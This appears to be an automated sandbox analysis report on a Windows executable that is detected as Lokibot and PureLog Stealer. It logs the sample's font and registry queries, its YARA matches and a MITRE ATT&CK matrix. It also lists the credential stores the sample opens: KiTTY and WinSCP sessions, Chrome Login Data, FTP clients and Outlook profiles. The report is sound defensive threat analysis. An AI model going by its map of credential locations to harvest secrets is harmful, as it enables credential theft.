Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SCB#89940578.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.SCB#89940578.exe.7be0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.3b19970.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\SCB#89940578.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SCB#89940578.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\SCB#89940578.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\SCB#89940578.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\SCB#89940578.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Users\user\Desktop\SCB#89940578.exe	Code function: SmtpPassword		2_2_0040D069

Source: Yara match	File source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.SCB#89940578.exe.7be0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.3b19970.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	111 Process Injection	1 Disable or Modify Tools	2 Credentials in Registry	41 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	2 Data from Local System	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	111 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
